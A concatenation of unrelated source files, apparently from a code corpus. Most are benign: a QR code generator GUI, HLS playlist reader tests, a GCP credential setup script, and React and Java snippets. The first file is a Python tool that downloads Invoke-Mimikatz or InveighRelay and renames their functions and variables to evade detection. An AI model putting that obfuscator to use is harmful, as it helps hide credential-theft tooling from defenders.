newlines.append(line.replace(oldName, newName))
return newlines
def checkIgnoreWords(wordcheck):
# lazy ass way
result = True
for word in IGNORE:
if word in wordcheck:
result = False
break
return result
def getFunctionNames(content):
# Searches for Function names then finds & replaces with random string
replaceList = {}
newlines = []
for i in content:
pattern = re.search('^\s*[f|F]unction\s(.*\w$)', i)
if (pattern):
if (checkIgnoreWords(pattern.group(1))):
functionName = pattern.group(1)
newName = makeRandom()
replaceList[functionName] = newName
if(functionName.endswith(')')):
parenValues = re.search('\((.+)\)', functionName) # \((.+)\) <-- regex to find (...)
if(parenValues not in IGNORE):
newlines.append(i.replace(functionName,newName+'('+parenValues.group(1)+')'))
else:
newlines.append(i.replace(functionName,newName+'()'))
else:
newlines.append(i.replace(functionName,newName))
else:
newlines.append(i)
else:
newlines.append(i)
return newlines, replaceList
def deleteLines(start, end, content):
# Delete lines between start & end inclusively
newLines = [] # just easier using a list for the moment
for i, line in enumerate(content):
if (i < (start - 1)):
newLines.append(line)
#print line
continue
elif (i >= end):
newLines.append(line)
#print line
continue
else:
continue
return newLines
def removeComments(content):
# Needs a better regex
newlines = []
for i in content:
if (re.search('^(\s*)#', i.rstrip())):
continue
else:
newlines.append(i)
return newlines
def removeBlockComments(mimi):
# Removes commented lines from Invoke-Mimikatz.ps1
mimiLines = mimi.splitlines()
commentsRemoved = ''
first = 0
second = 0
for num, line in enumerate(mimiLines, 1):
if (line.startswith('<#')):
first = num
if (line.startswith('#>')):
second = num
commentsRemoved = deleteLines(first, second, mimiLines)
return commentsRemoved
def replaceVariableNames(content, oldName, newName):
# Replaces variable names with new ones
newlines = []
for line in content:
newlines.append(line.replace(oldName, "$"+newName))
return newlines
def getVariablesNames(content):
# Change variable names
replaceList = {}
temp = []
newlines = []
for i in content:
pattern = re.search('(\$\w+)[-\s=|\s=]', i)
if((pattern) and pattern.group(1) not in IGNORE):
#print pattern.group(1)
temp.append(pattern.group(1))
for i in set(temp):
replaceList[i] = makeRandom()
#print "$"+i + " $" + replaceList[i]
return replaceList
def getTargetPSH(url):
# Download Mimikatz for treatement
invoke = False
orgPSH = requests.get(url, stream=True)
orgPSH.raw.decode_content = True
if("Invoke-" in orgPSH.content):
invoke = True
return orgPSH.content,invoke
def printUsage():
usage = '\n'
usage += ("Example Usage: \n")
usage += ("\t" + sys.argv[0] + " --psh InveighRelay\n")
usage += ("\t" + sys.argv[0] + " -p Mimikatz\n")
return usage
def description():
desc = "\n"
desc += ("Simple & Convoluted Powershell obfuscation tool v%s: \n" % __version__)
desc += ("Grabs a Powershell script from the tubes, remplaces function names & calls\n")
desc += ("To randomly generated string, and removes block comments & empty lines.\n")
desc += ("\t* Currently changes function name.\n")
desc += ("\t* Does variable but could be better.\n\n")
desc += ("Author: %s \n" % __author__)
desc += ("License: %s \n" % __license__)
desc += ("Status: %s \n" % __status__)
desc += ("You can experiment and try the script on some of these examples here:\n")
desc += ("http://www.robvanderwoude.com/powershellexamples.php\n")
desc += printUsage()
return desc
def main():
global NUMFUNCTIONNAMES, NUMVARIABLES
parser = argparse.ArgumentParser(description=description(), formatter_class=RawTextHelpFormatter)
parser.add_argument('--psh', '-p', dest='pshScript', required=True, help='Available scripts to download:\n- Mimikatz\n- InveighRelay')
args = parser.parse_args()
print banners.smallSlant
if(args.pshScript == 'Mimikatz'):
url = MIMIURL
elif(args.pshScript == 'InveighRelay'):
url = INVEIGHRELAY
else:
url = raw_input("[+] Enter URL [http://127.0.0.1:8000/test.ps1]: ") or TEST
print("[-] Fetching from: " + bcolours.GREEN + url + bcolours.ENDC)
PSHscript, invoke = getTargetPSH(url)
PSHscript = removeBlockComments(PSHscript)
PSHscript = removeEmptyLines(PSHscript)
PSHscript = removeComments(PSHscript)
PSHscript, dictListFunctions = getFunctionNames(PSHscript)
for key in dictListFunctions:
PSHscript = replaceFunctionCalls(PSHscript, key, dictListFunctions[key])
dictListVars = getVariablesNames(PSHscript)
for key in dictListVars:
PSHscript = replaceVariableNames(PSHscript, key, dictListVars[key])
if(invoke):
# Cheap way to find if Invoke- is in the file
newFunctionName = raw_input("[+] What name do you want the main function to be called [default is random]:") or makeRandom()
PSHscript = replaceFunctionCalls(PSHscript, 'Invoke-'+args.pshScript, 'Invoke-' + newFunctionName)
print("[-] New function name: " + bcolours.GREEN + "Invoke-"+newFunctionName+bcolours.ENDC)
print("[-] Number of functions renamed: " + bcolours.GREEN + str(len(dictListFunctions)) + bcolours.ENDC)
print("[-] Number of variables renamed: " + bcolours.GREEN + str(len(dictListVars)) + bcolours.ENDC)
writeNewFile(PSHscript)
if __name__ == '__main__':
# start
main()
|
from tkinter import *
# import os
import qrcode
from PIL import Image, ImageTk
from resizeimage import resizeimage
# QR Code Generator | Designed by <NAME>
class Qr_Genrator():
def __init__(self, root):
self.root=root
self.root.title("QR Code Generator")
self.root.geometry('900x500+200+50')
self.root.resizable(False, False)
title = Label(self.root,text=" QR Code Genrator", font=("time new roman",40), bg="#F96900", fg="white", anchor="w").place(x=0,y=0,relwidth=1)
# Variable
self.var_emp_code=StringVar()
self.var_name=StringVar()
self.var_department=StringVar()
self.var_designation=StringVar()
# Employee detail window design
emp_Frame=Frame(self.root,bd=2, relief=RIDGE,bg="white")
emp_Frame.place(x=50, y=100, width=500, height=380)
emp_title = Label(emp_Frame,text=" Employee Details", font=("goudy old style",20), bg="#FB9316", fg="white").place(x=0,y=0,relwidth=1)
lbl_emp_code = Label(emp_Frame,text=" Employee ID", font=("time new roman",15), bg="white").place(x=20,y=60)
lbl_emp_name = Label(emp_Frame,text=" Name", font=("time new roman",15), bg="white").place(x=20,y=100)
lbl_emp_dept = Label(emp_Frame,text=" Department", font=("time new roman",15), bg="white").place(x=20,y=140)
lbl_emp_designation = Label(emp_Frame,text=" Designation", font=("time new roman",15), bg="white").place(x=20,y=180)
text_emp_code = Entry(emp_Frame, font=("time new roman",15), textvariable=self.var_emp_code, bg="lightyellow").place(x=200,y=60)
text_emp_name = Entry(emp_Frame, font=("time new roman",15), textvariable=self.var_name, bg="lightyellow").place(x=200,y=100)
text_emp_dept = Entry(emp_Frame, font=("time new roman",15), textvariable=self.var_department, bg="lightyellow").place(x=200,y=140)
text_emp_designation = Entry(emp_Frame, font=("time new roman",15), textvariable=self.var_designation, bg="lightyellow").place(x=200,y=180)
btn_genrator = Button(emp_Frame, text="QR Genrator", command=self.genrate, font=("time new roman", 15, "bold"), bg="#2196f3", fg="white").place(x=90, y=250, width=180, height="30")
btn_clear = Button(emp_Frame, text="Clear", command=self.clear, font=("time new roman", 15, "bold"), bg="#2196f3", fg="white").place(x=290, y=250, width=120, height="30")
self.msg=""
self.lbl_msg = Label(emp_Frame, text=self.msg, font=("time new roman",15), bg="white", fg="green")
self.lbl_msg.place(x=0,y=320, relwidth=1)
# Qr Code window design
qr_Frame=Frame(self.root,bd=2, relief=RIDGE,bg="white")
qr_Frame.place(x=600, y=100, width=250, height=380)
emp_title = Label(qr_Frame,text="Employee QR code", font=("goudy old style",15), bg="#FB9316", fg="white").place(x=0,y=0,relwidth=1)
self.qr_code = Label(qr_Frame, text="No QR\n available", font=("time new roman",15), bg="#D76C02", fg="white", bd=1, relief=RIDGE)
self.qr_code.place(x=35, y=100, width=180, height=180)
def clear(self):
self.var_emp_code.set('')
self.var_name.set('')
self.var_department.set('')
self.var_designation.set('')
self.msg=""
self.lbl_msg.config(text=self.msg)
self.qr_code.config(image='')
def genrate(self):
if self.var_emp_code.get() == '' or self.var_name.get() == '' or self.var_department.get() == '' or self.var_designation.get() == '':
self.msg="All filed required !!!"
self.lbl_msg.config(text=self.msg, fg="red")
else:
qr_data=(f"Employee Id:{self.var_emp_code.get()}\nEmployee Name:{self.var_name.get()}\nDepartment:{self.var_department.get()}\nDesignation:{self.var_designation.get()}")
qr_code=qrcode.make(qr_data)
# print(qr_code)
qr_code=resizeimage.resize_cover(qr_code,[180,180])
qr_code.save('./QR-code-Genrator/employee_qr/emp_'+str(self.var_emp_code.get()+'.png'))
# qr code img update
self.im=ImageTk.PhotoImage(file='../QR-code-Genrator/employee_qr/emp_'+str(self.var_emp_code.get()+'.png'))
self.qr_code.config(image=self.im)
# updating noti
self.msg="QR genrated Successful!!"
self.lbl_msg.config(text=self.msg, fg="green")
root = Tk()
obj = Qr_Genrator(root)
root.mainloop()
|
# $EDITOR
export EDITOR=nvim
|
import subprocess
def start_screen_session(session_name, script_path):
subprocess.run(['screen', '-d', '-m', '-S', session_name, 'python', script_path])
def list_screen_sessions():
result = subprocess.run(['screen', '-ls'], capture_output=True, text=True)
print(result.stdout)
def terminate_screen_session(session_name):
subprocess.run(['screen', '-X', '-S', session_name, 'quit'])
# Example usage
start_screen_session('TwitterMiner', 'Collector.py')
list_screen_sessions()
terminate_screen_session('TwitterMiner') |
<reponame>kanongil/hls-playlist-reader
'use strict';
const Events = require('events');
const Fs = require('fs');
const Os = require('os');
const Path = require('path');
const Url = require('url');
const Boom = require('@hapi/boom');
const Code = require('@hapi/code');
const Hoek = require('@hapi/hoek');
const Lab = require('@hapi/lab');
const M3U8Parse = require('m3u8parse');
const Shared = require('./_shared');
const { createReader, HlsPlaylistReader } = require('..');
const { AttrList } = require('m3u8parse/lib/attrlist');
// Declare internals
const internals = {};
// Test shortcuts
const lab = exports.lab = Lab.script();
const { after, before, describe, it } = lab;
const { expect } = Code;
describe('HlsPlaylistReader()', () => {
const readPlaylists = Shared.readSegments.bind(null, HlsPlaylistReader);
let server;
before(async () => {
server = await Shared.provisionServer();
return server.start();
});
after(() => {
return server.stop();
});
describe('constructor', () => {
it('creates a valid object', async () => {
const r = new HlsPlaylistReader('http://localhost:' + server.info.port + '/simple/500.m3u8', {
extensions: null,
maxStallTime: null
});
const closed = Events.once(r, 'close');
expect(r).to.be.instanceOf(HlsPlaylistReader);
await Hoek.wait(10);
r.destroy();
await closed;
});
it('supports URL objects', () => {
const url = 'http://localhost:' + server.info.port + '/simple/500.m3u8';
expect(new HlsPlaylistReader(new URL(url)).destroy()).to.be.instanceOf(HlsPlaylistReader);
});
it('throws on missing uri option', () => {
const createObject = () => {
return new HlsPlaylistReader();
};
expect(createObject).to.throw();
});
it('throws on invalid uri option', () => {
const createObject = () => {
return new HlsPlaylistReader('asdf://test');
};
expect(createObject).to.throw();
});
});
it('can be created through helper', () => {
const url = 'http://localhost:' + server.info.port + '/simple/500.m3u8';
expect(createReader(url).destroy()).to.be.instanceOf(HlsPlaylistReader);
expect(createReader(new URL(url)).destroy()).to.be.instanceOf(HlsPlaylistReader);
});
it('emits error on missing remote host', async () => {
const promise = readPlaylists('http://does.not.exist/simple/500.m3u8');
await expect(promise).to.reject(Error, /getaddrinfo ENOTFOUND does\.not\.exist/);
});
it('emits error for missing data', async () => {
const promise = readPlaylists(`http://localhost:${server.info.port}/notfound`);
await expect(promise).to.reject(Error, /Not Found/);
});
it('emits error for http error responses', async () => {
const promise = readPlaylists(`http://localhost:${server.info.port}/error`);
await expect(promise).to.reject(Error, /Internal Server Error/);
});
it('emits error on non-index responses', async () => {
const promise = readPlaylists(`http://localhost:${server.info.port}/simple/500.mp4`);
await expect(promise).to.reject(Error, /Invalid MIME type/);
});
it('emits error on malformed index files', async () => {
const promise = readPlaylists(`http://localhost:${server.info.port}/simple/malformed.m3u8`);
await expect(promise).to.reject(M3U8Parse.ParserError);
});
describe('canUpdate()', () => {
it('returns true before index is received', () => {
const reader = new HlsPlaylistReader('http://localhost:' + server.info.port + '/simple/500.m3u8');
expect(reader.index).to.not.exist();
expect(reader.canUpdate()).to.be.true();
reader.destroy();
});
it('returns false when destroyed', () => {
const reader = new HlsPlaylistReader('http://localhost:' + server.info.port + '/simple/500.m3u8');
reader.destroy();
expect(reader.index).to.not.exist();
expect(reader.canUpdate()).to.be.false();
});
});
describe('master index', () => {
it('stops after reading index', async () => {
const playlists = await readPlaylists(`http://localhost:${server.info.port}/simple/index.m3u8`);
expect(playlists).to.have.length(1);
expect(playlists[0]).to.contain(['index', 'playlist', 'meta']);
expect(playlists[0].playlist).to.not.exist();
const { index } = playlists[0];
expect(index).to.exist();
expect(index.master).to.be.true();
expect(index.variants[0].uri).to.exist();
});
it('supports a data: url', async () => {
const buf = await Fs.promises.readFile(Path.join(__dirname, 'fixtures', 'index.m3u8'));
const playlists = await readPlaylists('data:application/vnd.apple.mpegurl;base64,' + buf.toString('base64'));
expect(playlists).to.have.length(1);
expect(playlists[0]).to.contain(['index', 'playlist', 'meta']);
expect(playlists[0].playlist).to.not.exist();
const { index } = playlists[0];
expect(index).to.exist();
expect(index.master).to.be.true();
expect(index.variants[0].uri).to.exist();
});
});
describe('on-demand index', () => {
it('stops after reading index', async () => {
const playlists = await readPlaylists(`http://localhost:${server.info.port}/simple/500.m3u8`);
expect(playlists).to.have.length(1);
expect(playlists[0]).to.contain(['index', 'playlist', 'meta']);
const { index } = playlists[0];
expect(index).to.exist();
expect(index.master).to.be.false();
expect(index.segments[0].uri).to.exist();
});
it('supports a data: url', async () => {
const buf = await Fs.promises.readFile(Path.join(__dirname, 'fixtures', '500.m3u8'));
const playlists = await readPlaylists('data:application/vnd.apple.mpegurl;base64,' + buf.toString('base64'));
expect(playlists).to.have.length(1);
expect(playlists[0]).to.contain(['index', 'playlist', 'meta']);
const { index } = playlists[0];
expect(index).to.exist();
expect(index.master).to.be.false();
expect(index.segments[0].uri).to.exist();
});
it('applies the extensions option', async () => {
const extensions = {
'#EXT-MY-HEADER': false,
'#EXT-MY-SEGMENT-OK': true
};
const r = new HlsPlaylistReader('file://' + Path.join(__dirname, 'fixtures', '500.m3u8'), { extensions });
const playlists = [];
for await (const obj of r) {
playlists.push(obj);
}
expect(playlists).to.have.length(1);
const { index } = playlists[0];
expect(index).to.exist();
expect(index.vendor[0]).to.equal(['#EXT-MY-HEADER', 'hello']);
expect(index.segments[1].vendor[0]).to.equal(['#EXT-MY-SEGMENT-OK', null]);
});
it('can be destroyed', async () => {
const r = new HlsPlaylistReader('file://' + Path.join(__dirname, 'fixtures', '500.m3u8'));
const playlists = [];
for await (const obj of r) {
playlists.push(obj);
r.destroy();
}
expect(playlists).to.have.length(1);
});
it('can be destroyed before read()', async () => {
const r = new HlsPlaylistReader('file://' + Path.join(__dirname, 'fixtures', '500.m3u8'));
const playlists = [];
while (!r.playlist) {
await Hoek.wait(1);
}
r.destroy();
for await (const obj of r) {
playlists.push(obj);
}
expect(playlists).to.have.length(0);
});
// handles all kinds of segment reference url
// handles .m3u files
});
describe('live index', { parallel: false }, () => {
const serverState = { state: {} };
let liveServer;
const prepareLiveReader = function (readerOptions = {}, state = {}) {
const reader = new HlsPlaylistReader(`http://localhost:${liveServer.info.port}/live/live.m3u8`, { ...readerOptions });
reader._intervals = [];
reader.getUpdateInterval = function (updated) {
this._intervals.push(HlsPlaylistReader.prototype.getUpdateInterval.call(this, updated));
return undefined;
};
serverState.state = { firstMsn: 0, segmentCount: 10, targetDuration: 2, ...state };
return { reader, state: serverState.state };
};
before(() => {
liveServer = Shared.provisionLiveServer(serverState);
return liveServer.start();
});
after(() => {
return liveServer.stop();
});
it('handles a basic stream (http)', async () => {
const { reader, state } = prepareLiveReader();
const playlists = [];
for await (const obj of reader) {
const lastMsn = obj.playlist.index.lastMsn();
expect(lastMsn).to.equal(playlists.length + 9);
playlists.push(obj);
state.firstMsn++;
if (state.firstMsn >= 5) {
state.firstMsn = 5;
state.ended = true;
}
}
expect(playlists).to.have.length(6);
});
it('handles a basic stream (file)', async () => {
const state = serverState.state = { firstMsn: 0, segmentCount: 10, targetDuration: 10 };
const tmpDir = await Fs.promises.mkdtemp(await Fs.promises.realpath(Os.tmpdir()) + Path.sep);
try {
const tmpUrl = new URL('next.m3u8', Url.pathToFileURL(tmpDir + Path.sep));
const indexUrl = new URL('index.m3u8', Url.pathToFileURL(tmpDir + Path.sep));
await Fs.promises.writeFile(indexUrl, Shared.genIndex(state).toString(), 'utf-8');
const reader = new HlsPlaylistReader(indexUrl.href);
const playlists = [];
(async () => {
while (!state.ended) {
await Hoek.wait(50);
state.firstMsn++;
if (state.firstMsn === 5) {
state.ended = true;
}
// Atomic write
await Fs.promises.writeFile(tmpUrl, Shared.genIndex(state).toString(), 'utf-8');
await Fs.promises.rename(tmpUrl, indexUrl);
}
})();
for await (const obj of reader) {
expect(obj.playlist.index.media_sequence).to.equal(playlists.length);
playlists.push(obj);
}
expect(playlists).to.have.length(6);
}
finally {
await Fs.promises.rm(tmpDir, { recursive: true });
}
});
it('emits "error" on a data: url', async () => {
const state = serverState.state = { firstMsn: 0, segmentCount: 10, targetDuration: 10 };
const buf = Buffer.from(Shared.genIndex(state).toString(), 'utf-8');
const reader = new HlsPlaylistReader('data:application/vnd.apple.mpegurl;base64,' + buf.toString('base64'));
const playlists = [];
await expect((async () => {
for await (const obj of reader) {
playlists.push(obj);
}
})()).to.reject('data: uri cannot be updated');
expect(playlists).to.have.length(1);
});
it('does not internally buffer (highWaterMark=0)', async () => {
const { reader, state } = prepareLiveReader();
for await (const obj of reader) {
expect(obj).to.exist();
await Hoek.wait(20);
expect(reader.readableBuffer).to.have.length(0);
state.firstMsn++;
if (state.firstMsn >= 5) {
state.firstMsn = 5;
state.ended = true;
}
}
});
it('can handle playlist starting with 0 segments', async () => {
const { reader, state } = prepareLiveReader({}, { segmentCount: 0, index() {
const index = Shared.genIndex(state);
index.type = 'EVENT';
if (state.segmentCount === 5) {
state.ended = true;
}
else {
state.segmentCount++;
}
return index;
} });
const playlists = [];
for await (const obj of reader) {
expect(obj.playlist.index.lastMsn() + obj.playlist.index.ended).to.equal(playlists.length - 1);
playlists.push(obj);
}
expect(playlists).to.have.length(7);
});
it('emits "close" event when destroyed without consuming', async () => {
const { reader } = prepareLiveReader();
const closeEvent = Events.once(reader, 'close');
while (!reader.playlist) {
await Hoek.wait(1);
}
reader.destroy();
await closeEvent;
});
it('handles a temporary server outage', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
if (state.error === undefined && state.firstMsn === 5) {
state.error = 6;
}
if (state.error) {
--state.error;
++state.firstMsn;
throw new Error('fail');
}
if (state.firstMsn === 20) {
state.ended = true;
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const errors = [];
reader.on('problem', errors.push.bind(errors));
const playlists = [];
for await (const obj of reader) {
playlists.push(obj);
}
expect(playlists).to.have.length(15);
expect(errors.length).to.be.greaterThan(0);
expect(errors[0]).to.be.an.error('Internal Server Error');
});
it('handles temporarily going back in time', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
if (state.firstMsn >= 5) {
state.firstMsn = 5;
state.ended = true;
}
if (state.firstMsn === 2 && !state.jumped) {
state.jumped = true;
state.firstMsn = 0;
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const playlists = [];
const problems = [];
reader.on('problem', (err) => problems.push(err));
for await (const obj of reader) {
playlists.push(obj);
}
expect(playlists).to.have.length(6);
expect(problems).to.have.length(1);
expect(problems[0]).to.be.an.error('Rejected update from the past');
});
it('eventually goes back in time', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
if (state.firstMsn >= 5) {
state.firstMsn = 5;
state.ended = true;
}
if (state.firstMsn === 4 && !state.jumped) {
state.jumped = true;
state.firstMsn = 0;
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const playlists = [];
const problems = [];
reader.on('problem', (err) => problems.push(err));
for await (const obj of reader) {
playlists.push(obj);
}
expect(playlists).to.have.length(8);
expect(problems).to.have.length(2);
expect(problems[1]).to.be.an.error('Rejected update from the past');
});
it('respects the maxStallTime option', async () => {
const { reader } = prepareLiveReader({ maxStallTime: 50 }, { segmentCount: 1 });
await expect((async () => {
for await (const obj of reader) {
expect(obj).to.exist();
}
})()).to.reject(Error, /Index update stalled/);
});
it('errors thrown during "problem" event handler are escalated', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
if (state.firstMsn === 5) {
throw Boom.internal();
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const problems = [];
reader.on('problem', (err) => {
problems.push(err);
throw err;
});
const playlists = [];
const err = await expect((async () => {
for await (const obj of reader) {
playlists.push(obj);
}
})()).to.reject('Internal Server Error');
expect(playlists).to.have.length(5);
expect(problems).to.have.length(1);
expect(problems[0]).to.shallow.equal(err);
});
describe('destroy()', () => {
it('works when called while waiting for an update', async () => {
const { reader, state } = prepareLiveReader({ fullStream: false }, {
async index() {
if (state.firstMsn > 0) {
await Hoek.wait(100);
}
return Shared.genIndex(state);
}
});
setTimeout(() => reader.destroy(), 50);
const playlists = [];
for await (const obj of reader) {
playlists.push(obj);
state.firstMsn++;
}
expect(playlists).to.have.length(1);
});
it('emits passed error', async () => {
const { reader, state } = prepareLiveReader({ fullStream: false }, {
async index() {
if (state.firstMsn > 0) {
await Hoek.wait(10);
}
return Shared.genIndex(state);
}
});
setTimeout(() => reader.destroy(new Error('destroyed')), 50);
await expect((async () => {
for await (const {} of reader) {
state.firstMsn++;
}
})()).to.reject('destroyed');
});
});
// TODO: move
describe('isRecoverableUpdateError()', () => {
it('is called on index update errors', async () => {
const { reader, state } = prepareLiveReader({}, {
index() {
const { error } = state;
if (error) {
state.error++;
switch (error) {
case 1:
case 2:
case 3:
throw Boom.notFound();
case 4:
throw Boom.serverUnavailable();
case 5:
throw Boom.unauthorized();
}
}
else if (state.firstMsn === 5) {
state.error = 1;
return '';
}
const index = Shared.genIndex(state);
++state.firstMsn;
return index;
}
});
const errors = [];
reader.isRecoverableUpdateError = function (err) {
errors.push(err);
return HlsPlaylistReader.prototype.isRecoverableUpdateError.call(reader, err);
};
const playlists = [];
const err = await expect((async () => {
for await (const obj of reader) {
playlists.push(obj);
}
})()).to.reject('Unauthorized');
expect(playlists).to.have.length(5);
expect(errors).to.have.length(4);
expect(errors[0]).to.have.error(M3U8Parse.ParserError, 'Missing required #EXTM3U header');
expect(errors[1]).to.have.error(Boom.Boom, 'Not Found');
expect(errors[2]).to.have.error(Boom.Boom, 'Service Unavailable');
expect(errors[3]).to.shallow.equal(err);
});
});
describe('with LL-HLS', () => {
const prepareLlReader = function (readerOptions = {}, state = {}, indexGen) {
return prepareLiveReader({
lowLatency: true,
...readerOptions
}, {
partIndex: 0,
partCount: 5,
index: indexGen,
...state
});
};
const { genLlIndex } = Shared;
it('handles a basic stream', async () => {
const { reader, state } = prepareLlReader({}, { partIndex: 4, end: { msn: 20, part: 3 } }, (query) => genLlIndex(query, state));
const playlists = [];
const expected = { msn: 10, parts: state.partIndex };
for await (const obj of reader) {
const index = obj.playlist.index;
expect(index.lastMsn(true)).to.equal(expected.msn);
expect(index.getSegment(index.lastMsn(true)).parts.length).to.equal(expected.parts);
++expected.parts;
if (expected.parts > state.partCount) {
++expected.msn;
expected.parts = 1;
}
if (!index.ended) {
expect(reader.hints.part).to.exist();
}
playlists.push(obj);
}
expect(playlists).to.have.length(50);
expect(reader.hints.part).to.not.exist();
});
it('ignores LL parts when lowLatency=false', async () => {
const { reader, state } = prepareLlReader({ lowLatency: false }, { partIndex: 4, end: { msn: 20, part: 3 } }, (query) => genLlIndex(query, state));
const playlists = [];
for await (const obj of reader) {
expect(reader.hints.part).to.not.exist();
playlists.push(obj);
}
expect(playlists.length).to.equal(13);
});
it('handles weird hint changes (or no change)', async () => {
const hints = new Set();
const { reader, state } = prepareLlReader({}, { partIndex: 4, end: { msn: 15, part: 3 } }, (query) => {
const index = genLlIndex(query, state);
let hint;
if (state.partIndex === 1 || state.partIndex === 2) {
hint = new AttrList({ type: 'PART', uri: '"a"' });
}
else if (state.partIndex === 3) {
hint = new AttrList({ type: 'PART', uri: '"a"', 'byterange-start': '0' });
}
else if (state.partIndex === 4) {
hint = new AttrList({ type: 'PART', uri: '"a"', 'byterange-start': '0', 'byterange-length': '10' });
}
index.meta.preload_hints = hint ? [hint] : undefined;
return index;
});
const playlists = [];
for await (const obj of reader) {
playlists.push(obj);
hints.add(reader.hints);
}
expect(playlists).to.have.length(25);
expect(hints.size).to.equal(19);
});
});
// TODO: resilience??
});
});
|
<reponame>elvcastelo/mathjax-react<gh_stars>0
import Context from './Context'
import Node from './Node'
export { Context, Node }
export default { Context, Node } |
<filename>nova-gestion-backend/src/main/java/ca/nova/gestion/mappers/EmployeeMapper.java
package ca.nova.gestion.mappers;
import ca.nova.gestion.model.Employee;
import org.apache.ibatis.annotations.Mapper;
import org.springframework.stereotype.Repository;
@Mapper
@Repository
public interface EmployeeMapper {
Employee getEmployee(int idEmployee);
void updateEmployee(Employee employee);
void insertEmployee(Employee employee);
}
|
#!/bin/bash
if [ "$1" = "" ]; then
echo
echo -e 'usage: '$0' mock|aws|azure|gcp|alibaba|tencent|ibm|openstack|cloudit|ncp|nhncloud'
echo -e '\n\tex) '$0' aws'
echo
exit 0;
fi
source ./setup.env $1
echo "============== before get KeyPair: '${KEYPAIR_NAME}'"
time $CLIPATH/spctl --config $CLIPATH/spctl.conf keypair get --cname "${CONN_CONFIG}" -n "${KEYPAIR_NAME}" 2> /dev/null
echo "============== after get KeyPair: '${KEYPAIR_NAME}'"
echo -e "\n\n"
echo "============== before get SecurityGroup: '${SG_NAME}'"
time $CLIPATH/spctl --config $CLIPATH/spctl.conf security get --cname "${CONN_CONFIG}" -n "${SG_NAME}" 2> /dev/null
echo "============== after get SecurityGroup: '${SG_NAME}'"
echo -e "\n\n"
echo "============== before get VPC/Subnet: '${VPC_NAME}'"
time $CLIPATH/spctl --config $CLIPATH/spctl.conf vpc get --cname "${CONN_CONFIG}" -n "${VPC_NAME}" 2> /dev/null
echo "============== after get VPC/Subnet: '${VPC_NAME}'"
echo -e "\n\n"
|
#!/bin/bash
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Add GCP credentials path to configuration defaults file.
# Check arguments for existing json key file.
# arguments: <project-id>-<unique-id>.json
function checkArgs () {
local FILE_ARG='<path to json service account key file>'
if [ -z "$1" ]; then
echo 'Error: missing argument.'
echo "$0 ${FILE_ARG}"
exit 1
fi
if [ "$1" != "exists" ] && [ ! -e "$1" ]; then
echo 'Error: file not found.'
echo "$0 ${FILE_ARG}"
exit 1
fi
}
# Backup existing and create new - if credentials.bak exists fail.
# arguments: source_credentials_file target_file_path
function backupAndCopyCredentials() {
local BACKUP_FILE="$2.bak.$(date +%s)"
if [ -e $2 ]; then
cp "$2" "${BACKUP_FILE}"
echo "Created backup (${BACKUP_FILE})."
fi
cp "$1" "$2"
echo "Created $2 from $1."
}
# Start a new terraform.tfvars file.
# arguments: full_path_file_name.
function createTFVars() {
if [ ! -e $1 ]; then
echo "/*" > $1
echo " * Initialized Terraform variables." >> $1
echo " */" >> $1
fi
}
# If not already present, add a key-value to tfvars file.
# arguments: tfvars_path_file_name key value
function addTFVar() {
if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ]; then
echo 'Error: missing argument for addTFVar().'
exit 1
fi
local VAR_NAME="$2"
local KEY_EXISTS="$(cat $1 | grep $2)"
if [ -z "${KEY_EXISTS}" ]; then
echo "" >> $1
echo "$2 = \"$3\"" >> $1
echo "Updated $2 in $1."
fi
}
# Create fresh GCP credentials file and point Terraform at it.
# arguments: <project-id>-<unique-id>.json
function createCredentials () {
# ~ only expands when NOT quoted (below).
local CREDS_FILE_DIR=~/.config/gcloud
local CREDS_FILE_PATH="${CREDS_FILE_DIR}/credentials_autonetdeploy.json"
local THIS_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
local LB1_DIR_PATH="${THIS_DIR}/example-lb"
local LB1_FILE_PATH="${LB1_DIR_PATH}/terraform.tfvars"
local LB2_DIR_PATH="${THIS_DIR}/example-lb-internal"
local LB2_FILE_PATH="${LB2_DIR_PATH}/terraform.tfvars"
local LB3_DIR_PATH="${THIS_DIR}/example-lb-http"
local LB3_FILE_PATH="${LB3_DIR_PATH}/terraform.tfvars"
local TFVAR_CREDS='gcp_credentials_file_path'
if [ "$1" != "exists" ]; then
mkdir -p ${CREDS_FILE_DIR}
backupAndCopyCredentials $1 ${CREDS_FILE_PATH}
fi
createTFVars "${LB1_FILE_PATH}"
addTFVar "${LB1_FILE_PATH}" "${TFVAR_CREDS}" "${CREDS_FILE_PATH}"
createTFVars "${LB2_FILE_PATH}"
addTFVar "${LB2_FILE_PATH}" "${TFVAR_CREDS}" "${CREDS_FILE_PATH}"
createTFVars "${LB3_FILE_PATH}"
addTFVar "${LB3_FILE_PATH}" "${TFVAR_CREDS}" "${CREDS_FILE_PATH}"
}
# Copy/create file under ~/.config/gcloud
checkArgs $1
# Pass "exists" to skip credential file copying.
createCredentials $1
|
<filename>use-cases/Synthetic/t204/m1.js
var _;
_ = isPrototypeOf.length;
_ = isPrototypeOf.name;
isPrototypeOf.length = {};
isPrototypeOf.name = {};
isPrototypeOf();
|
import React from 'react';
import { mount } from 'enzyme';
import moment from 'moment';
import { DayPickerSingleDateController } from 'react-dates';
import { act, cleanup, render } from '@testing-library/react';
import InputText from '../../InputText';
import DatePicker from '../index';
jest.useFakeTimers();
const defaultProps = {
type: 'date',
name: 'date',
onChange: jest.fn(),
};
const renderComponent = (props = defaultProps) =>
mount(<DatePicker {...props} />);
describe('<DatePicker />', () => {
afterEach(cleanup);
// eslint-disable-next-line jest/expect-expect
it('should not crash', () => {
renderComponent();
});
it('should match snapshot', () => {
const { asFragment } = render(<DatePicker {...defaultProps} />);
expect(asFragment()).toMatchSnapshot();
});
